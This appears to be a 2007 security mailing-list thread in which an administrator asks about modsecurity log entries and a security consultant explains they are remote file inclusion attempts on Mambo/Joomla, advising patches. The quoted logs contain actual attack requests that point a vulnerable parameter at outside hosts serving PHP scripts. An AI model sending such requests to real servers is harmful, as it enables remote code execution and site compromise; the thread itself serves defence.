Re: PHP web exploit/vulnerability

[Danux <danuxx () gmail com>]

First of all, that kind of attacks are trying to exploit a Content
Management Software called "Mambo" or maybe Joomla (Next Generation),
so, if you have this sw installed on you server you should check if
you have the required patches!! if you dont have this sw... then they
are all false positives.

But you should check also if your PHP apps are not vulnerable to this
kind of attacks:
I mean... Remote File Inclusion, so on.

Cheers!!!!

On 10/23/07, Camilo Olea <colea () sunset com mx> wrote:
> Hello everyone,
>
> I'm sorry if this is a stupid question, but I just wanted your input,
> maybe direct me to some links, another mail list, or whatever you might
> add would be highly appreciated; we have modsecurity installed on our
> server, and it has been logging many attacks like the following:
>
> GET
> /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti
> \
> ngen.de/admin/ec.txt? HTTP/1.1
>
> GET
> /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%
> \
> 20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1
>
> GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1
>
> I managed to get a copy of the php script which these attacks try to
> force the server to execute, I could post it here if that is correct and
> anybody could take a look at it and help me out a little to understand
> what it's trying to do.
>
> Any help is appreciated, thanks in advance.
>
> Camilo Olea


-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com